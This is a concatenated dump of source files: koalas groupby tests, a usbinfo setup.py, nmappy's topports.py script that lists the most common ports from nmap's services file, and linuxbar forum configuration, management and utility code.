        for pdf1, pdf2 in zip(pdfs1, pdfs2):
            kdf1 = ks.from_pandas(pdf1)
            kdf2 = ks.from_pandas(pdf2)

            for as_index in [True, False]:
                if as_index:
                    sort = lambda df: df.sort_index()
                else:
                    sort = lambda df: df.sort_values("c").reset_index(drop=True)
                self.assert_eq(
                    sort(kdf1.groupby(kdf2.a, as_index=as_index).sum()),
                    sort(pdf1.groupby(pdf2.a, as_index=as_index).sum()),
                )
                self.assert_eq(
                    sort(kdf1.groupby(kdf2.a, as_index=as_index).c.sum()),
                    sort(pdf1.groupby(pdf2.a, as_index=as_index).c.sum()),
                )
                self.assert_eq(
                    sort(kdf1.groupby(kdf2.a, as_index=as_index)["c"].sum()),
                    sort(pdf1.groupby(pdf2.a, as_index=as_index)["c"].sum()),
                )

    def test_groupby_multiindex_columns(self):
        pdf1 = pd.DataFrame(
            {("y", "c"): [4, 2, 7, 3, None, 1, 1, 1, 2], ("z", "d"): list("abcdefght")}
        )
        pdf2 = pd.DataFrame(
            {("x", "a"): [1, 2, 6, 4, 4, 6, 4, 3, 7], ("x", "b"): [4, 2, 7, 3, 3, 1, 1, 1, 2]}
        )
        kdf1 = ks.from_pandas(pdf1)
        kdf2 = ks.from_pandas(pdf2)

        self.assert_eq(
            kdf1.groupby(kdf2[("x", "a")]).sum().sort_index(),
            pdf1.groupby(pdf2[("x", "a")]).sum().sort_index(),
        )

        self.assert_eq(
            kdf1.groupby(kdf2[("x", "a")], as_index=False)
            .sum()
            .sort_values(("y", "c"))
            .reset_index(drop=True),
            pdf1.groupby(pdf2[("x", "a")], as_index=False)
            .sum()
            .sort_values(("y", "c"))
            .reset_index(drop=True),
        )
        self.assert_eq(
            kdf1.groupby(kdf2[("x", "a")])[[("y", "c")]].sum().sort_index(),
            pdf1.groupby(pdf2[("x", "a")])[[("y", "c")]].sum().sort_index(),
        )

    def test_split_apply_combine_on_series(self):
        pdf1 = pd.DataFrame({"C": [0.362, 0.227, 1.267, -0.562], "B": [1, 2, 3, 4]})
        pdf2 = pd.DataFrame({"A": [1, 1, 2, 2]})
        kdf1 = ks.from_pandas(pdf1)
        kdf2 = ks.from_pandas(pdf2)

        for as_index in [True, False]:
            if as_index:
                sort = lambda df: df.sort_index()
            else:
                sort = lambda df: df.sort_values(list(df.columns)).reset_index(drop=True)

            with self.subTest(as_index=as_index):
                self.assert_eq(
                    sort(kdf1.groupby(kdf2.A, as_index=as_index).sum()),
                    sort(pdf1.groupby(pdf2.A, as_index=as_index).sum()),
                )
                self.assert_eq(
                    sort(kdf1.groupby(kdf2.A, as_index=as_index).B.sum()),
                    sort(pdf1.groupby(pdf2.A, as_index=as_index).B.sum()),
                )

        self.assert_eq(
            kdf1.B.groupby(kdf2.A).sum().sort_index(),
            pdf1.B.groupby(pdf2.A).sum().sort_index(),
        )
        self.assert_eq(
            (kdf1.B + 1).groupby(kdf2.A).sum().sort_index(),
            (pdf1.B + 1).groupby(pdf2.A).sum().sort_index(),
        )

    def test_aggregate(self):
        pdf1 = pd.DataFrame({"C": [0.362, 0.227, 1.267, -0.562], "B": [1, 2, 3, 4]})
        pdf2 = pd.DataFrame({"A": [1, 1, 2, 2]})
        kdf1 = ks.from_pandas(pdf1)
        kdf2 = ks.from_pandas(pdf2)

        for as_index in [True, False]:
            if as_index:
                sort = lambda df: df.sort_index()
            else:
                sort = lambda df: df.sort_values(list(df.columns)).reset_index(drop=True)

            with self.subTest(as_index=as_index):
                self.assert_eq(
                    sort(kdf1.groupby(kdf2.A, as_index=as_index).agg("sum")),
                    sort(pdf1.groupby(pdf2.A, as_index=as_index).agg("sum")),
                )
                self.assert_eq(
                    sort(kdf1.groupby(kdf2.A, as_index=as_index).agg({"B": "min", "C": "sum"})),
                    sort(pdf1.groupby(pdf2.A, as_index=as_index).agg({"B": "min", "C": "sum"})),
                )
                self.assert_eq(
                    sort(
                        kdf1.groupby(kdf2.A, as_index=as_index).agg(
                            {"B": ["min", "max"], "C": "sum"}
                        )
                    ),
                    sort(
                        pdf1.groupby(pdf2.A, as_index=as_index).agg(
                            {"B": ["min", "max"], "C": "sum"}
                        )
                    ),
                )

        # multi-index columns
        columns = pd.MultiIndex.from_tuples([("Y", "C"), ("X", "B")])
        pdf1.columns = columns
        kdf1.columns = columns

        columns = pd.MultiIndex.from_tuples([("X", "A")])
        pdf2.columns = columns
        kdf2.columns = columns

        for as_index in [True, False]:
            stats_kdf = kdf1.groupby(kdf2[("X", "A")], as_index=as_index).agg(
                {("X", "B"): "min", ("Y", "C"): "sum"}
            )
            stats_pdf = pdf1.groupby(pdf2[("X", "A")], as_index=as_index).agg(
                {("X", "B"): "min", ("Y", "C"): "sum"}
            )
            self.assert_eq(
                stats_kdf.sort_values(by=[("X", "B"), ("Y", "C")]).reset_index(drop=True),
                stats_pdf.sort_values(by=[("X", "B"), ("Y", "C")]).reset_index(drop=True),
            )

        stats_kdf = kdf1.groupby(kdf2[("X", "A")]).agg(
            {("X", "B"): ["min", "max"], ("Y", "C"): "sum"}
        )
        stats_pdf = pdf1.groupby(pdf2[("X", "A")]).agg(
            {("X", "B"): ["min", "max"], ("Y", "C"): "sum"}
        )
        self.assert_eq(
            stats_kdf.sort_values(
                by=[("X", "B", "min"), ("X", "B", "max"), ("Y", "C", "sum")]
            ).reset_index(drop=True),
            stats_pdf.sort_values(
                by=[("X", "B", "min"), ("X", "B", "max"), ("Y", "C", "sum")]
            ).reset_index(drop=True),
        )

    def test_duplicated_labels(self):
        pdf1 = pd.DataFrame({"A": [3, 2, 1]})
        pdf2 = pd.DataFrame({"A": [1, 2, 3]})
        kdf1 = ks.from_pandas(pdf1)
        kdf2 = ks.from_pandas(pdf2)

        self.assert_eq(
            kdf1.groupby(kdf2.A).sum().sort_index(), pdf1.groupby(pdf2.A).sum().sort_index()
        )
        self.assert_eq(
            kdf1.groupby(kdf2.A, as_index=False).sum().sort_values("A").reset_index(drop=True),
            pdf1.groupby(pdf2.A, as_index=False).sum().sort_values("A").reset_index(drop=True),
        )

    def test_apply(self):
        pdf = pd.DataFrame(
            {"a": [1, 2, 3, 4, 5, 6], "b": [1, 1, 2, 3, 5, 8], "c": [1, 4, 9, 16, 25, 36]},
            columns=["a", "b", "c"],
        )
        pkey = pd.Series([1, 1, 2, 3, 5, 8])
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).apply(lambda x: x + x.min()).sort_index(),
            pdf.groupby(pkey).apply(lambda x: x + x.min()).sort_index(),
        )
        self.assert_eq(
            kdf.groupby(kkey)["a"].apply(lambda x: x + x.min()).sort_index(),
            pdf.groupby(pkey)["a"].apply(lambda x: x + x.min()).sort_index(),
        )
        self.assert_eq(
            kdf.groupby(kkey)[["a"]].apply(lambda x: x + x.min()).sort_index(),
            pdf.groupby(pkey)[["a"]].apply(lambda x: x + x.min()).sort_index(),
        )
        self.assert_eq(
            kdf.groupby(["a", kkey]).apply(lambda x: x + x.min()).sort_index(),
            pdf.groupby(["a", pkey]).apply(lambda x: x + x.min()).sort_index(),
        )

    def test_transform(self):
        pdf = pd.DataFrame(
            {"a": [1, 2, 3, 4, 5, 6], "b": [1, 1, 2, 3, 5, 8], "c": [1, 4, 9, 16, 25, 36]},
            columns=["a", "b", "c"],
        )
        pkey = pd.Series([1, 1, 2, 3, 5, 8])
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).transform(lambda x: x + x.min()).sort_index(),
            pdf.groupby(pkey).transform(lambda x: x + x.min()).sort_index(),
        )
        self.assert_eq(
            kdf.groupby(kkey)["a"].transform(lambda x: x + x.min()).sort_index(),
            pdf.groupby(pkey)["a"].transform(lambda x: x + x.min()).sort_index(),
        )
        self.assert_eq(
            kdf.groupby(kkey)[["a"]].transform(lambda x: x + x.min()).sort_index(),
            pdf.groupby(pkey)[["a"]].transform(lambda x: x + x.min()).sort_index(),
        )
        self.assert_eq(
            kdf.groupby(["a", kkey]).transform(lambda x: x + x.min()).sort_index(),
            pdf.groupby(["a", pkey]).transform(lambda x: x + x.min()).sort_index(),
        )

    def test_filter(self):
        pdf = pd.DataFrame(
            {"a": [1, 2, 3, 4, 5, 6], "b": [1, 1, 2, 3, 5, 8], "c": [1, 4, 9, 16, 25, 36]},
            columns=["a", "b", "c"],
        )
        pkey = pd.Series([1, 1, 2, 3, 5, 8])
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).filter(lambda x: any(x.a == 2)).sort_index(),
            pdf.groupby(pkey).filter(lambda x: any(x.a == 2)).sort_index(),
        )
        self.assert_eq(
            kdf.groupby(kkey)["a"].filter(lambda x: any(x == 2)).sort_index(),
            pdf.groupby(pkey)["a"].filter(lambda x: any(x == 2)).sort_index(),
        )
        self.assert_eq(
            kdf.groupby(kkey)[["a"]].filter(lambda x: any(x.a == 2)).sort_index(),
            pdf.groupby(pkey)[["a"]].filter(lambda x: any(x.a == 2)).sort_index(),
        )
        self.assert_eq(
            kdf.groupby(["a", kkey]).filter(lambda x: any(x.a == 2)).sort_index(),
            pdf.groupby(["a", pkey]).filter(lambda x: any(x.a == 2)).sort_index(),
        )

    def test_head(self):
        pdf = pd.DataFrame(
            {
                "a": [1, 1, 1, 1, 2, 2, 2, 3, 3, 3] * 3,
                "b": [2, 3, 1, 4, 6, 9, 8, 10, 7, 5] * 3,
                "c": [3, 5, 2, 5, 1, 2, 6, 4, 3, 6] * 3,
            },
        )
        pkey = pd.Series([1, 1, 1, 1, 2, 2, 2, 3, 3, 3] * 3)
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            pdf.groupby(pkey).head(2).sort_index(), kdf.groupby(kkey).head(2).sort_index()
        )
        self.assert_eq(
            pdf.groupby("a")["b"].head(2).sort_index(), kdf.groupby("a")["b"].head(2).sort_index()
        )
        self.assert_eq(
            pdf.groupby("a")[["b"]].head(2).sort_index(),
            kdf.groupby("a")[["b"]].head(2).sort_index(),
        )
        self.assert_eq(
            pdf.groupby([pkey, "b"]).head(2).sort_index(),
            kdf.groupby([kkey, "b"]).head(2).sort_index(),
        )

    def test_cummin(self):
        pdf = pd.DataFrame(
            {
                "a": [1, 2, 3, 4, 5, 6] * 3,
                "b": [1, 1, 2, 3, 5, 8] * 3,
                "c": [1, 4, 9, 16, 25, 36] * 3,
            },
        )
        pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3)
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).cummin().sort_index(),
            pdf.groupby(pkey).cummin().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)["a"].cummin().sort_index(),
            pdf.groupby(pkey)["a"].cummin().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)[["a"]].cummin().sort_index(),
            pdf.groupby(pkey)[["a"]].cummin().sort_index(),
            almost=True,
        )

    def test_cummax(self):
        pdf = pd.DataFrame(
            {
                "a": [1, 2, 3, 4, 5, 6] * 3,
                "b": [1, 1, 2, 3, 5, 8] * 3,
                "c": [1, 4, 9, 16, 25, 36] * 3,
            },
        )
        pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3)
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).cummax().sort_index(),
            pdf.groupby(pkey).cummax().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)["a"].cummax().sort_index(),
            pdf.groupby(pkey)["a"].cummax().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)[["a"]].cummax().sort_index(),
            pdf.groupby(pkey)[["a"]].cummax().sort_index(),
            almost=True,
        )

    def test_cumsum(self):
        pdf = pd.DataFrame(
            {
                "a": [1, 2, 3, 4, 5, 6] * 3,
                "b": [1, 1, 2, 3, 5, 8] * 3,
                "c": [1, 4, 9, 16, 25, 36] * 3,
            },
        )
        pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3)
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).cumsum().sort_index(),
            pdf.groupby(pkey).cumsum().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)["a"].cumsum().sort_index(),
            pdf.groupby(pkey)["a"].cumsum().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)[["a"]].cumsum().sort_index(),
            pdf.groupby(pkey)[["a"]].cumsum().sort_index(),
            almost=True,
        )

    def test_cumprod(self):
        pdf = pd.DataFrame(
            {
                "a": [1, 2, 3, 4, 5, 6] * 3,
                "b": [1, 1, 2, 3, 5, 8] * 3,
                "c": [1, 4, 9, 16, 25, 36] * 3,
            },
        )
        pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3)
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).cumprod().sort_index(),
            pdf.groupby(pkey).cumprod().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)["a"].cumprod().sort_index(),
            pdf.groupby(pkey)["a"].cumprod().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)[["a"]].cumprod().sort_index(),
            pdf.groupby(pkey)[["a"]].cumprod().sort_index(),
            almost=True,
        )

    def test_diff(self):
        pdf = pd.DataFrame(
            {
                "a": [1, 2, 3, 4, 5, 6] * 3,
                "b": [1, 1, 2, 3, 5, 8] * 3,
                "c": [1, 4, 9, 16, 25, 36] * 3,
            }
        )
        pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3)
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).diff().sort_index(),
            pdf.groupby(pkey).diff().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)["a"].diff().sort_index(),
            pdf.groupby(pkey)["a"].diff().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)[["a"]].diff().sort_index(),
            pdf.groupby(pkey)[["a"]].diff().sort_index(),
            almost=True,
        )

    def test_rank(self):
        pdf = pd.DataFrame(
            {
                "a": [1, 2, 3, 4, 5, 6] * 3,
                "b": [1, 1, 2, 3, 5, 8] * 3,
                "c": [1, 4, 9, 16, 25, 36] * 3,
            },
        )
        pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3)
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).rank().sort_index(),
            pdf.groupby(pkey).rank().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)["a"].rank().sort_index(),
            pdf.groupby(pkey)["a"].rank().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)[["a"]].rank().sort_index(),
            pdf.groupby(pkey)[["a"]].rank().sort_index(),
            almost=True,
        )

    @unittest.skipIf(pd.__version__ < "0.24.0", "not supported before pandas 0.24.0")
    def test_shift(self):
        pdf = pd.DataFrame(
            {
                "a": [1, 1, 2, 2, 3, 3] * 3,
                "b": [1, 1, 2, 2, 3, 4] * 3,
                "c": [1, 4, 9, 16, 25, 36] * 3,
            },
        )
        pkey = pd.Series([1, 1, 2, 2, 3, 4] * 3)
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).shift().sort_index(),
            pdf.groupby(pkey).shift().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)["a"].shift().sort_index(),
            pdf.groupby(pkey)["a"].shift().sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)[["a"]].shift().sort_index(),
            pdf.groupby(pkey)[["a"]].shift().sort_index(),
            almost=True,
        )

    def test_fillna(self):
        pdf = pd.DataFrame(
            {
                "A": [1, 1, 2, 2] * 3,
                "B": [2, 4, None, 3] * 3,
                "C": [None, None, None, 1] * 3,
                "D": [0, 1, 5, 4] * 3,
            }
        )
        pkey = pd.Series([1, 1, 2, 2] * 3)
        kdf = ks.from_pandas(pdf)
        kkey = ks.from_pandas(pkey)

        self.assert_eq(
            kdf.groupby(kkey).fillna(0).sort_index(),
            pdf.groupby(pkey).fillna(0).sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)["C"].fillna(0).sort_index(),
            pdf.groupby(pkey)["C"].fillna(0).sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)[["C"]].fillna(0).sort_index(),
            pdf.groupby(pkey)[["C"]].fillna(0).sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey).fillna(method="bfill").sort_index(),
            pdf.groupby(pkey).fillna(method="bfill").sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)["C"].fillna(method="bfill").sort_index(),
            pdf.groupby(pkey)["C"].fillna(method="bfill").sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)[["C"]].fillna(method="bfill").sort_index(),
            pdf.groupby(pkey)[["C"]].fillna(method="bfill").sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey).fillna(method="ffill").sort_index(),
            pdf.groupby(pkey).fillna(method="ffill").sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)["C"].fillna(method="ffill").sort_index(),
            pdf.groupby(pkey)["C"].fillna(method="ffill").sort_index(),
            almost=True,
        )
        self.assert_eq(
            kdf.groupby(kkey)[["C"]].fillna(method="ffill").sort_index(),
            pdf.groupby(pkey)[["C"]].fillna(method="ffill").sort_index(),
            almost=True,
        )
```
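Every test above follows the same recipe: enable `compute.ops_on_diff_frames`, group one frame by a key that lives in a different frame, then compare against plain pandas. A minimal standalone sketch of that pattern (illustrative only; exact result dtypes may vary across koalas versions, hence the relaxed comparison):

```python
import pandas as pd
from databricks import koalas as ks
from databricks.koalas.config import set_option, reset_option

# Without this option, koalas refuses operations that would require an
# implicit (and potentially expensive) join between two Spark DataFrames.
set_option("compute.ops_on_diff_frames", True)
try:
    kdf = ks.from_pandas(pd.DataFrame({"c": [4, 2, 7, 3]}))
    key = ks.from_pandas(pd.Series([1, 1, 2, 2], name="a"))

    result = kdf.groupby(key).sum().sort_index().to_pandas()
    expected = (pd.DataFrame({"c": [4, 2, 7, 3]})
                .groupby(pd.Series([1, 1, 2, 2], name="a")).sum())
    pd.testing.assert_frame_equal(result, expected, check_dtype=False)
finally:
    reset_option("compute.ops_on_diff_frames")
```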
{ "source": "90michaeltran/usbinfo", "score": 2 }
#### File: 90michaeltran/usbinfo/setup.py
```python
import platform

from setuptools import setup

PKG_NAME = 'usbinfo'

PKG_VERSION_MAJOR = 1
PKG_VERSION_MINOR = 0
PKG_VERSION_MICRO = 4

PKG_VERSION = '{major}.{minor}.{micro}'.format(
    major=PKG_VERSION_MAJOR,
    minor=PKG_VERSION_MINOR,
    micro=PKG_VERSION_MICRO)

PKG_AUTHOR = ', '.join(['<NAME>', '<NAME>'])
PKG_AUTHOR_EMAIL = ', '.join(['<EMAIL>', '<EMAIL>'])

PKG_DESC = 'Module for introspecting USB devices on a system'

PKG_LONG_DESC = """
{pkg} is a Python module for performing introspection on endpoints attached
to the USB subsystems. {pkg} allows scripts to access information about those
endpoints such as vendor and product ID, manufacturer and product names,
serial numbers, and character device files.

{pkg} is eventually intended to be portable across as many platforms that
Python itself is ported to.
""".format(pkg=PKG_NAME)


def main():
    setup_data = dict(
        name=PKG_NAME,
        version=PKG_VERSION,
        packages=['usbinfo'],
        author=PKG_AUTHOR,
        author_email=PKG_AUTHOR_EMAIL,
        description=PKG_DESC,
        long_description=PKG_LONG_DESC,
        license='Apache 2 license',
        platforms=['Linux', 'Darwin'],
        classifiers=[
            'Development Status :: 5 - Production/Stable',
            'Environment :: Console',
            'Intended Audience :: Developers',
            'Intended Audience :: Manufacturing',
            'Intended Audience :: Science/Research',
            'Intended Audience :: Telecommunications Industry',
            'License :: OSI Approved :: Apache Software License',
            'Operating System :: MacOS :: MacOS X',
            'Operating System :: POSIX :: Linux',
            'Programming Language :: Python',
            'Programming Language :: Python :: 2.6',
            'Programming Language :: Python :: 2.7',
            'Programming Language :: Python :: 3.4',
            'Programming Language :: Python :: 3.5',
            'Topic :: Software Development',
            'Topic :: Software Development :: Libraries :: Python Modules',
            'Topic :: Software Development :: Testing',
            'Topic :: System',
            'Topic :: System :: Shells',
            'Topic :: Terminals',
        ],
        install_requires=[],
        entry_points={
            'console_scripts': [
                'usbinfo = usbinfo.__main__:main'
            ]
        }
    )

    if platform.system() == 'Linux':
        setup_data['install_requires'].append('pyudev')

    setup(**setup_data)


if __name__ == '__main__':
    main()
```
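The `console_scripts` entry point makes the package usable as a `usbinfo` command after installation, and the same data is reachable from Python. A hypothetical usage sketch (the `usbinfo()` call and the dictionary keys are assumptions based on the package description, not taken from this file; verify against the package docs):

```python
# Hypothetical sketch: assumes the package exposes a top-level usbinfo()
# returning a list of dicts, one per attached USB endpoint.
import usbinfo

for endpoint in usbinfo.usbinfo():
    print(endpoint.get('idVendor'), endpoint.get('idProduct'),
          endpoint.get('iSerialNumber'))
```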
{ "source": "90sled/nmappy", "score": 3 }
#### File: 90sled/nmappy/topports.py
```python
import sys, csv


def read_services(nmap_services_file):
    sfile = csv.reader(open(nmap_services_file, 'r'), dialect='excel-tab')

    services = []
    for s in sfile:
        if not str(s[0]).startswith('#'):
            services.append((s[1], s[0], s[2]))

    return sorted(services, key=lambda s: s[2], reverse=True)


def main():
    if len(sys.argv) == 1:
        print 'usage: topports.py [top # of ports] [optional: tcp|udp]'
        print 'example: topports.py 10 tcp\n'
        print 'TopPorts v1.0 ( https://github.com/bitsadmin/nmappy/ )'
        return -1

    max = 10
    type = 'tcp'
    if len(sys.argv) > 1:
        max = int(sys.argv[1])
    if len(sys.argv) > 2:
        type = sys.argv[2]

    # If needed, adjust to path of 'nmap-services' file
    # In Kali: /usr/share/nmap/nmap-services
    services = read_services('nmap-services')
    services = filter(lambda s: s[0].endswith(type), services)
    print ','.join([s[0].split('/')[0] for s in services[0:max]])


if __name__ == '__main__':
    main()
```
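`read_services` expects the tab-separated `nmap-services` format (`service<TAB>port/proto<TAB>frequency`) and returns `(port/proto, service, frequency)` tuples. Note that the frequency stays a string; the descending sort is still correct only because nmap writes every frequency in the same fixed `0.xxxxxx` width. A sketch of a direct call (Python 2, matching the script; the sample output value is illustrative):

```python
# Assumes an 'nmap-services' file in the working directory, as in main().
rows = read_services('nmap-services')
print rows[0]   # e.g. ('80/tcp', 'http', '0.484143') -- most frequent port first
```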
{ "source": "910JQK/linuxbar", "score": 2 }
#### File: 910JQK/linuxbar/config.example.py
```python
import os


DB_WILDCARD = '*'  # SQLite = *, others = %

DEFAULT_CONFIG = {
    'site_name': 'Linuxbar',
    'site_url': 'http://127.0.0.1:5000',
    'mail_addr': '<EMAIL>',
    'count_topic': '30',
    'count_post': '25',
    'count_item': '15'
}

PREFIX_ENABLED = False
PREFIX = '/linuxbar'

LOCALE = 'zh_CN'
DEBUG = True
SECRET_KEY = b'\<KEY>'

INACTIVE_USER_LIFETIME = 30  # minutes
TOKEN_LIFETIME = 20  # minutes
SUMMARY_LENGTH = 90  # in [4, 128] (128 = Topic.summary.max_length / 4)
THUMBNAIL_MAX_HEIGHT = 96  # pixels
BAN_DAYS = [1, 3, 10, 30, 100]
LINK_PROTOCOLS = ['http', 'https', 'ftp']

TIEBA_COMP = False
TIEBA_SYNC_ON = False
TIEBA_SYNC_KW = 'linux'
TIEBA_SYNC_INTERVAL = 300
TIEBA_SYNC_DELAY = 10
TIEBA_SYNC_OFFSET = 7
TIEBA_SYNC_PENDING_MAX = 15
TIEBA_SYNC_P = [
    1.0,  # probability of sync when the topic list is accessed
    0.5,  # a topic
    0.2   # a post
]
TIEBA_SUBMIT_URL = 'http://tieba.baidu.com/mo/m/submit'
TIEBA_M_URL = 'http://tieba.baidu.com/mo/m'
TIEBA_FLR_URL = 'http://tieba.baidu.com/mo/m/flr'
TIEBA_TIMG_URL = 'http://m.tiebaimg.com/timg?wapp&quality=100&size=b2000_2000'
TIEBA_EMOTICON_URL = 'http://tb2.bdstatic.com/tb/editor/images/'

CODE_BEGIN = '/***#'
CODE_END = '#***/'
PID_SIGN = 'p#'
TID_SIGN = 't#'
INLINE_CODE_SIGN = '`'  # a single char
NOTIFICATION_SIGN = '@'  # a single char
IMAGE_SIGN = '%%'
FACE_SIGN = '#'
IMAGE_LIMIT = 15
FACE_LIMIT = 20
FORMAT_SIGN = '**'
FORMAT_DEFAULT = '*'  # a single char
FORMATS = {
    '*': 'b',
    '~': 'i',
    '!': 'del'  # a single char: tag name
}

RICHTEXT_INFO = '''
<p><b>Bold</b>: <code>***bold**</code> or <code>**bold**</code></p>
<p><i>Italic</i>: <code>**~italic**</code></p>
<p><del>Mask</del>: <code>**!Mask**</code></p>
<p><code>Inline Code</code>: <code>`Inline Code`</code></p>
<p>Image: <code>%%hash</code></p>
<p>Face: <code>#name</code></p>
<div class="highlight"><pre>
Code Box:
/***# language
code code code
#***/
</pre>
</div>
'''

RICHTEXT_INFO_JSON = '''
{
    "formats": [
        ["bold", "**", "**"],
        ["italic", "**~", "**"],
        ["mask", "**!", "**"],
        ["inline_code", "`", "`"]
    ],
    "image_prefix": "%%",
    "face_prefix": "#",
    "code_prefix": "/***#",
    "code_suffix": "#***/"
}
'''

UPLOAD_FOLDER = 'upload'
MAX_UPLOAD_SIZE = 7 * 1024 * 1024
IMAGE_MIME = {'png': 'image/png', 'jpeg': 'image/jpeg', 'gif': 'image/gif'}


def assert_config():
    assert os.path.isdir(UPLOAD_FOLDER)
    assert SUMMARY_LENGTH in range(4, 128+1)
    assert len(INLINE_CODE_SIGN) == 1
    assert len(NOTIFICATION_SIGN) == 1
    assert len(FORMAT_DEFAULT) == 1
    for sign in FORMATS:
        assert len(sign) == 1
```
#### File: 910JQK/linuxbar/manage.py
```python
import re
import os
import json
from getpass import getpass

from app import run
from models import User, Profile, init_db
from utils import now

from argparse import ArgumentParser


def create_administrator():
    mail = input('Email address: ')
    name = input('Nickname: ')
    password = getpass('Password: ')
    confirm = getpass('Confirm password: ')
    if password != confirm:
        print('Passwords are inconsistent.')
        return
    else:
        conflict = User.select().where(
            (User.mail == mail.lower()) | (User.name == name)
        )
        if conflict:
            print('Conflict detected. Failed to create account.')
            return
        user = User(
            mail = mail.lower(),
            name = name,
            level = 2,
            date_register = now(),
            is_active = True
        )
        user.set_password(password)
        user.save(force_insert=True)
        Profile.create(user=user)
        print('New administrator created successfully.')


def create_post_move_account():
    name = input('Nickname: ')
    password = getpass('Password: ')
    confirm = getpass('Confirm password: ')
    if password != confirm:
        print('Passwords are inconsistent.')
        return
    else:
        user = User(
            mail = 'move_post@foobar',
            name = name,
            date_register = now(),
            is_active = True
        )
        user.set_password(password)
        user.save(force_insert=True)
        Profile.create(user=user)


def gen_js_trans_file():
    messages = {}
    TRANS_STR = re.compile('_\(\'([^\']+)')
    for filename in os.listdir('static'):
        if filename.endswith('.js'):
            path = os.path.join('static', filename)
            f = open(path)
            for line in f.readlines():
                for match in TRANS_STR.finditer(line):
                    msgid = match.expand('\\1')
                    messages[msgid] = ''
    msg_str = json.dumps(messages)
    msg_str = msg_str.replace('{', '{\n')
    msg_str = msg_str.replace(',', ',\n')
    msg_str = msg_str.replace('}', '\n}')
    print(msg_str)


def main():
    commands = {
        'run': run,
        'init-db': init_db,
        'create-admin': create_administrator,
        'create-move': create_post_move_account,
        'gen-js-trans': gen_js_trans_file
    }
    parser = ArgumentParser()
    parser.add_argument(
        'cmd',
        metavar='Command',
        help='(%s)' % '|'.join(list(commands))
    )
    args = parser.parse_args()
    if commands.get(args.cmd):
        commands[args.cmd]()
    else:
        print('Invalid command')


if __name__ == '__main__':
    main()
```
#### File: 910JQK/linuxbar/utils.py
```python
import os
import re
import sys
import random
import hashlib
import datetime
import threading
import gettext
from math import log
from html import escape
from urllib.parse import quote, unquote

from config import LOCALE

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

import base64
from Crypto import Random
from Crypto.Cipher import AES


TOKEN_CHARS = '<KEY>'


now = datetime.datetime.now


locale_path = os.path.join(
    os.path.dirname(
        os.path.realpath(
            __file__
        )
    ),
    'translations'
)
translation = gettext.translation('messages', locale_path, languages=[LOCALE])


def _(string, string_pl=None, n=None):
    if not string_pl:
        return translation.gettext(string)
    else:
        return translation.ngettext(string, string_pl, n)


def info(*args, **kwargs):
    print(*args, file=sys.stderr, **kwargs)


def sha256(string):
    return hashlib.sha256(bytes(string, encoding='utf8')).hexdigest()


def md5(string):
    return hashlib.md5(bytes(string, encoding='utf8')).hexdigest()


def gen_token():
    return ''.join(random.choice(TOKEN_CHARS) for i in range(0, 16))


def url_quote(text):
    return quote(text, encoding='utf8')


def find_record_all(table, *args, **kwargs):
    query = table.select().where(
        *((getattr(table, field) == value) for field, value in kwargs.items())
    )
    for record in query:
        yield record


def find_record(table, *args, **kwargs):
    try:
        return find_record_all(table, *args, **kwargs).__next__()
    except StopIteration:
        return None


def path_get_level(path):
    return (len(path.split('/')) - 2)


def path_get_padding(level):
    # f(0) = 0, f(4) = 0.8 + 2.2 = 3
    return 0.8 + (2.2/log(1+4))*log(1+level)


def filter_append_time(string):
    return string + '?t=' + str(now().timestamp())


def get_color(string, saturation, lightness):
    hash_value = sha256(string)
    n256 = int(hash_value[0:2], 16)
    hue = int(round(360*(n256/256)))
